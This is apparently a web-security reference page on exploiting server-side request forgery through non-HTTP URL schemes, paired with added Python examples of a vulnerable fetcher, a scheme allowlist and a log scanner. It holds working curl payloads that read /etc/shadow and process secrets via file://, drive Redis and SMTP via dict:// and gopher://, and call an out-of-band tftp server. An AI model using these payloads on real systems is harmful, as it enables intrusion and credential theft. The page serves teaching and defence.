
Protocol Handler Exploitation

CWE: CWE-918
Tools: ssrfmap
Difficulty: 🔴 advanced

Exploit Protocol Handlers

Many URL-fetching libraries support schemes beyond http:// and https://. When a server hands a user-supplied URL to such a library, those extra protocol handlers can be abused for local file access, service interaction, and arbitrary TCP communication.
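The root cause above, shown as an added Python example that is not part of the original page, ssrfmap, or any project it cites: a fetch handler that passes the user-supplied URL straight to urllib honours every scheme the library knows (file:// included), beside a hardened version that allowlists http/https before any request is made. The function names (fetch_unsafe, validate_fetch_url, fetch_safe, demo_local_file_read) and the temporary file it reads are this example's own.

```python
# Added example (not from the original page, ssrfmap or any project it cites):
# a fetch handler that passes the user-supplied URL straight to urllib honours
# every scheme the library knows, file:// included, beside a hardened version
# that accepts only http/https. Names (fetch_unsafe, validate_fetch_url,
# fetch_safe, demo_local_file_read) are this example's own.
import os
import tempfile
import urllib.request
from urllib.parse import urlsplit
from urllib.request import pathname2url

ALLOWED_SCHEMES = {"http", "https"}


class UnsafeURLError(ValueError):
    """Raised when a fetch URL uses a scheme outside the allowlist."""


def fetch_unsafe(url: str) -> bytes:
    """Vulnerable pattern: no scheme check, so file:// and ftp:// are honoured."""
    with urllib.request.urlopen(url) as resp:  # deliberately unchecked
        return resp.read()


def validate_fetch_url(url: str) -> str:
    """Return the URL (stripped) if its scheme is http/https, else raise.

    Whitespace is stripped and the scheme lower-cased so that ' FILE://...'
    cannot slip past a naive startswith("http") check. A URL with no
    authority part (file:///..., a bare path, host:port) is rejected too,
    because several fetch libraries treat those as local resources.
    """
    cleaned = url.strip()
    parts = urlsplit(cleaned)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES or not parts.netloc:
        raise UnsafeURLError(f"scheme {scheme or '(none)'!r} not allowed for fetch")
    return cleaned


def is_allowed_fetch_url(url: str) -> bool:
    """Boolean form of validate_fetch_url for use in request handlers."""
    try:
        validate_fetch_url(url)
        return True
    except ValueError:  # UnsafeURLError, or urlsplit rejecting malformed input
        return False


def fetch_safe(url: str) -> bytes:
    """Hardened fetch: the scheme allowlist runs before any request is made.

    Blocking internal hosts/IP ranges and disabling redirects are separate
    controls that this example does not implement.
    """
    return fetch_unsafe(validate_fetch_url(url))


def demo_local_file_read() -> str:
    """Show the unsafe fetcher reading a local file through file://.

    The file and its contents are constructed here so the demo never touches
    real system files; pathname2url builds a correct file URL for the path.
    """
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("constructed-secret=example\n")
        path = f.name
    try:
        return fetch_unsafe("file://" + pathname2url(path)).decode()
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print("unsafe fetcher read:", demo_local_file_read().strip())
    for candidate in ["https://example.com/feed", "file:///etc/passwd",
                      "dict://127.0.0.1:6379/INFO", "gopher://127.0.0.1:6379/_"]:
        print(f"{candidate:35} allowed={is_allowed_fetch_url(candidate)}")
```

The scheme allowlist is deliberately the only control shown: it closes every handler on this page in one place, but it does nothing about an http:// URL pointing at 127.0.0.1 or a cloud metadata address, which needs a separate host check after DNS resolution.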

file:// -- Local File Read

```bash
# Linux targets
curl "https://TARGET/fetch?url=file:///etc/passwd"
curl "https://TARGET/fetch?url=file:///etc/shadow"
curl "https://TARGET/fetch?url=file:///proc/self/environ"   # environment variables (secrets)
curl "https://TARGET/fetch?url=file:///proc/self/cmdline"   # command line of the serving process
curl "https://TARGET/fetch?url=file:///var/www/html/config.php"

# Windows targets
curl "https://TARGET/fetch?url=file:///C:/Windows/System32/drivers/etc/hosts"
curl "https://TARGET/fetch?url=file:///C:/inetpub/wwwroot/web.config"
```

dict:// -- Service Interaction

```bash
# Query Redis
curl "https://TARGET/fetch?url=dict://127.0.0.1:6379/INFO"

# Query Memcached
curl "https://TARGET/fetch?url=dict://127.0.0.1:11211/stats"
```

gopher:// -- Arbitrary TCP Packets

Gopher is the most powerful scheme for SSRF exploitation: the percent-encoded bytes after the leading `_` in the path are sent verbatim to the chosen TCP port, so any plaintext internal service can be driven with crafted packets:

```bash
# Redis command injection: every byte of the command must be percent-encoded
# in the gopher URL (xxd gives raw hex, sed prefixes each byte with %)
PAYLOAD=$(echo -en "SET ssrf_key ssrf_value\r\n" | xxd -p | tr -d '\n' | sed 's/../%&/g')
curl "https://TARGET/fetch?url=gopher://127.0.0.1:6379/_${PAYLOAD}"

# SMTP message sending (demonstrates impact); awk adds the CRLF line endings
# SMTP expects before the payload is percent-encoded
SMTP_PAYLOAD=$(cat <<'INNER' | awk '{printf "%s\r\n", $0}' | xxd -p | tr -d '\n' | sed 's/../%&/g'
HELO attacker.com
MAIL FROM:<test@test.com>
RCPT TO:<admin@target.com>
DATA
Subject: SSRF PoC

SSRF vulnerability demonstrated.
.
QUIT
INNER
)
curl "https://TARGET/fetch?url=gopher://127.0.0.1:25/_${SMTP_PAYLOAD}"

# Use Gopherus to generate payloads for Redis, MySQL, FastCGI, etc.
gopherus --exploit redis
gopherus --exploit mysql
gopherus --exploit fastcgi
```

tftp:// -- Out-of-Band Detection

```bash
curl "https://TARGET/fetch?url=tftp://YOUR_SERVER/ssrf-test"
```
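Every section above rides on the same observable: a fetch parameter whose value starts with a non-HTTP scheme. The following is an added Python example, not code from the original page or from ssrfmap, that scans access-log lines for that pattern, undoing the extra percent-encoding layers attackers use to hide `file://` or `dict://` from naive string matches. The log format, the list of parameter names checked and the sample lines are constructed here; only the `/fetch` path and the `url` parameter are taken from the page's curl examples.

```python
# Added example (not from the original page or ssrfmap): a log scanner that
# flags requests whose fetch URL parameter carries a non-HTTP scheme, which is
# the pattern every section above relies on. The log format, the parameter
# names checked and the sample lines are constructed here; the /fetch path and
# the url parameter match the page's own curl examples.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Schemes that have no business in a server-side fetch parameter.
NON_HTTP_SCHEMES = {"file", "dict", "gopher", "tftp", "ftp", "sftp", "ldap", "jar", "data"}
# Query parameters commonly used to carry a URL to fetch (assumed names).
URL_PARAMS = ("url", "uri", "src", "target", "dest")

# Combined-log-style line: client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def extract_scheme(value: str) -> str:
    """Lower-cased scheme of a candidate URL after undoing extra encoding layers.

    parse_qs has already decoded the value once; a payload such as
    %2566ile%3A//... (the percent sign itself encoded) needs one more round,
    so up to two further rounds are applied until the string stops changing.
    """
    decoded = value
    for _ in range(2):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    try:
        return urlsplit(decoded.strip()).scheme.lower()
    except ValueError:  # malformed IPv6 brackets etc.
        return ""


def scan_access_log(lines):
    """Return one finding per URL parameter whose scheme is in NON_HTTP_SCHEMES."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        params = parse_qs(urlsplit(path).query, keep_blank_values=True)
        for name in URL_PARAMS:
            for value in params.get(name, []):
                scheme = extract_scheme(value)
                if scheme in NON_HTTP_SCHEMES:
                    findings.append({
                        "ip": m.group("ip"),
                        "param": name,
                        "scheme": scheme,
                        "status": m.group("status"),
                        "request": path,
                    })
    return findings


# Constructed sample lines; 203.0.113.5 is a documentation-range address.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /fetch?url=https://example.com/feed.xml HTTP/1.1" 200',
    '10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /fetch?url=file:///etc/passwd HTTP/1.1" 200',
    '10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /fetch?url=dict%3A%2F%2F127.0.0.1%3A6379%2FINFO HTTP/1.1" 500',
    '10.0.0.9 - - [10/Oct/2023:13:56:05 +0000] "GET /fetch?url=gopher://127.0.0.1:6379/_%53%45%54 HTTP/1.1" 200',
    '10.0.0.9 - - [10/Oct/2023:13:56:09 +0000] "GET /fetch?url=%2566ile%3A%2F%2F%2Fetc%2Fshadow HTTP/1.1" 403',
    '10.0.0.9 - - [10/Oct/2023:13:56:12 +0000] "GET /fetch?url=tftp://203.0.113.5/ssrf-test HTTP/1.1" 200',
    '10.0.0.2 - - [10/Oct/2023:13:57:00 +0000] "GET /healthz HTTP/1.1" 200',
]


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']:10} {f['scheme']:7} status={f['status']} {f['request']}")
```

A 200 on a `file://` or `gopher://` request is the finding that matters most, since it means the handler accepted the scheme; a 403 on the same pattern still shows who is probing. Matching on the decoded scheme rather than on the literal string `file://` is what keeps the `%2566ile` variant and mixed-case schemes in scope.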